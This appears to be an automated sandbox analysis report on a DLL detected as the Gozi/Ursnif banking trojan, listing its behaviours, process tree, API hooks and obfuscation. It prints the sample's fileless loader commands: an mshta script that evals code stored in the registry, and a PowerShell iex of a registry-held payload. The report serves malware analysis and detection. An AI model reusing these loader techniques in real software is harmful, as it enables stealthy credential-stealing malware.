Source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Writes registry values via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_027734D0 NtMapViewOfSection, 2_2_027734D0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_02774F73 GetProcAddress,NtCreateSection,memset, 2_2_02774F73
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_027711A9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 2_2_027711A9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_0277B159 NtQueryVirtualMemory, 2_2_0277B159
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_0540E529 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 2_2_0540E529
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05410D8D memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 2_2_05410D8D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_0540CCD9 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 2_2_0540CCD9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05415E21 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 2_2_05415E21
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_0541C6FE NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 2_2_0541C6FE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05405E8A NtQueryInformationProcess, 2_2_05405E8A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05422AAC NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 2_2_05422AAC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05414518 NtGetContextThread,RtlNtStatusToDosError, 2_2_05414518
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_054105FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 2_2_054105FC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05408F6D NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 2_2_05408F6D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_054117CD memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 2_2_054117CD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05422E10 NtQuerySystemInformation,RtlNtStatusToDosError, 2_2_05422E10
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_0540E6C4 memset,NtQueryInformationProcess, 2_2_0540E6C4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05403934 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 2_2_05403934
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_0540A818 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 2_2_0540A818
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_0540F314 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 2_2_0540F314
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05402A0A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 2_2_05402A0A
Contains functionality to launch a process as a different user
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_054235BC CreateProcessAsUserA, 2_2_054235BC
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_027728E9 2_2_027728E9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_0277AF34 2_2_0277AF34
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05423C5C 2_2_05423C5C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_0541BC93 2_2_0541BC93
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_0541CFA3 2_2_0541CFA3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05421669 2_2_05421669
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05412678 2_2_05412678
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05413604 2_2_05413604
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_0542086C 2_2_0542086C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05414804 2_2_05414804
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_0540C307 2_2_0540C307
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_0540BBA1 2_2_0540BBA1
PE file does not import any functions
Source: mu1rnx1a.dll.27.dr Static PE information: No import functions for PE file found
Source: yacmzdf3.dll.30.dr Static PE information: No import functions for PE file found
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\explorer.exe Section loaded: cryptdlg.dll
Uses 32bit PE files
Source: NJPcHPuRcG.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Yara signature match
Source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: NJPcHPuRcG.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.bank.troj.spyw.evad.winDLL@36/159@18/3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_027731DD CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification, 2_2_027731DD
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{75BD31D2-7017-11EB-90E5-ECF4BB570DC9}.dat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{8AE918E3-61CB-4CED-3B5E-25409F722974}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5148:120:WilError_01
Source: C:\Windows\SysWOW64\regsvr32.exe Mutant created: \Sessions\1\BaseNamedObjects\{F653DE64-DD3A-98FE-178A-614C3B5E2540}
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DFD1DF0FD1C3CEAF12.TMP
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: NJPcHPuRcG.dll Virustotal: Detection: 15%
Source: regsvr32.exe String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\NJPcHPuRcG.dll'
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\NJPcHPuRcG.dll
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:82962 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17422 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17430 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES78AB.tmp' 'c:\Users\user\AppData\Local\Temp\mu1rnx1a\CSC6647FE8FE542539CE2919E5B6D2D1D.TMP'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8CA0.tmp' 'c:\Users\user\AppData\Local\Temp\yacmzdf3\CSCE6DA2C7C1B814D8F891E10CFF0A5BBCE.TMP'
Source: unknown Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\NJPcHPuRcG.dll
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:82962 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17422 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17430 /prefetch:2
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES78AB.tmp' 'c:\Users\user\AppData\Local\Temp\mu1rnx1a\CSC6647FE8FE542539CE2919E5B6D2D1D.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8CA0.tmp' 'c:\Users\user\AppData\Local\Temp\yacmzdf3\CSCE6DA2C7C1B814D8F891E10CFF0A5BBCE.TMP'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\explorer.exe File opened: C:\Windows\SYSTEM32\msftedit.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: NJPcHPuRcG.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: NJPcHPuRcG.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: NJPcHPuRcG.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: NJPcHPuRcG.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: NJPcHPuRcG.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: NJPcHPuRcG.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: NJPcHPuRcG.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001B.00000002.386301089.000001BF2C130000.00000002.00000001.sdmp, csc.exe, 0000001E.00000002.395773551.0000021C02EB0000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000024.00000000.426711747.0000000006FE0000.00000002.00000001.sdmp
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000002.00000003.399265085.0000000005970000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: explorer.exe, 00000024.00000003.471981638.0000000006C40000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000002.00000003.399265085.0000000005970000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: explorer.exe, 00000024.00000003.471981638.0000000006C40000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000024.00000000.426711747.0000000006FE0000.00000002.00000001.sdmp
Source: NJPcHPuRcG.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: NJPcHPuRcG.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: NJPcHPuRcG.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: NJPcHPuRcG.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: NJPcHPuRcG.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_0542556E LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_0542556E
Registers a DLL
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\NJPcHPuRcG.dll
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_0277AF23 push ecx; ret 2_2_0277AF33
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_0277ABF0 push ecx; ret 2_2_0277ABF9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_0542769F push ecx; ret 2_2_054276AF
Source: initial sample Static PE information: section name: .text entropy: 6.87914884899

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.dll

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.328320558.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.328226726.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.328337032.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.328359150.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.328350143.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.328266588.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.328300905.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.336044765.0000000004DBB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 6448, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA9B33521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA9B335200
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\regsvr32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
